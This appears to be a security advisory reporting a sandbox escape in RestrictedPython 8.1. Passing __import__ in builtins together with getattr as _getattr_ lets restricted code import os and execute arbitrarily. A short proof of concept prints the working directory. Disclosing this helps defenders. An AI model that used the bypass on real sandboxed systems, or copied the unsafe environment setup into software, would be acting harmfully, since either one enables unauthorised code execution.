HIGH SEVERITYCONFIRMED
Sandbox fully bypassed when caller provides __import__ + getattr — confirmed RCE
Package
RestrictedPython
Version
8.1
Verified
2026-03-28
Description
RestrictedPython does not block `import os` at compile time. If a caller provides `__import__` in builtins and uses `_getattr_ = getattr` (a common shortcut found in documentation examples), unrestricted module imports succeed and arbitrary code executes. `compile_restricted('import os; result = os.getcwd()')` returns a valid code object — execution with the unsafe environment returns the real filesystem path.
Reproduction
from RestrictedPython import compile_restricted
code = 'import os; result = os.getcwd()'
r = compile_restricted(code, filename='<test>', mode='exec')
# r is a live code object — no error raised
glb = {'__builtins__': {'__import__': __import__}, '_getattr_': getattr}
exec(r, glb)
print(glb['result']) # Actual filesystem path returned — sandbox bypassed